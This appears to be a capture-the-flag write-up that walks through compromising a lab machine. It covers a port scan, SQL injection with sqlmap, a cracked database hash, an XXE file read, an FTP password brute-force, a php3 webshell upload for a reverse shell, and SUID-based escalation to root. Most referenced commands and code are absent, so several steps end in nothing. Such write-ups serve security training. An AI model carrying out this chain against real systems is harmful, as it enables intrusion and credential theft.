use nmap to do port scanning.

http port: 80 and 8081, check its 80 port first.

nothing special, using dirb to check for sensitive files and directories.

walked around and quickly found a sql injection here:

save the http request data as header.txt and run it with sqlmap.

walked around the mysql databases and found some useful information:

mysql current user: valenka@localhost

mysql user: phpmyadmin, hash: *D4020D9182CC52B86DC49251A1B6DA9AD7023B98(decrypted to be controls\$)

database: pokerleague:

database: vip:

​ table: sfc_user_accounts (salt is also in md5 format length, no hope to decrypt from online resources)

ok, this is an obvious xxe which allows me to read arbitrary files on server(if privilege is enough)

four users with /bin/bash:

root, le, valenka, ftpUserULTRA

and from the hint from above, “also pls update the password for the custom ftp acct once the front end is finished..since it’s easy “, I guess I need to bruteforce the ftp password with username ftpUserULTRA

tried bruteforcing with top 100000 passwords and finally get the correct one: bankbank

but port 22 is not open, I cannot connect to its sshd server. I guess I have to connect to its ftp then upload webshell to gain a shell.

tried hard and harder, the ftp does not allow me to upload file with php extension, but allows me to upload file with php3 extension. so I uploaded a php webshell end with php3 to gain a reverse shell.

looking for suid file:

and found one interesting file:

/opt/casino-royale/mi6_detect_test

seems like that mi6_detect_test is extracting output from ps and netstat, interestingly, if I execute mi6_detect_test outside the /opt/casino-royale/ folder, it will prompt “/bin/bash: run.sh: No such file or directory”

I guess mi6_detect_test is calling run.sh in the same folder when being executed. So if I can modify run.sh, then I would get a root shell. but run.sh is only editable by le.

take a closer look:

this is essentially the working directory for http server of 8081 port:

so the logic is:

le is running the http server at port 8081, as we can see from the output of mi6_detect_test

so when we click “Run Data Collect”, it(le) will execute collect.php, which will invoke casino-data-collection.py, and then will print out the output of casino-data-collection.py

notice that casino-data-collection.py is owned by le, but its group is www-data, which means I can modify it with webshell!

okay, the path is quite clear: I modify casino-data-collection.py to get a shell from le, then edit run.sh to provoke /bin/bash, and then run mi6_detect_test, since mi6_detect_test’s suid is set, it will call run.sh as root, then run.sh will provoke /bin/bash as root, which will give me a root shell.

I modified the casino-data-collection.py as below:

and click “Run Data Collect” in the browser, successfully get a reverse shell from le.

then I append one more line at the back of run.sh.

then I executed mi6_detect_test, and gain a root shell.

PS: This is a very good challenge.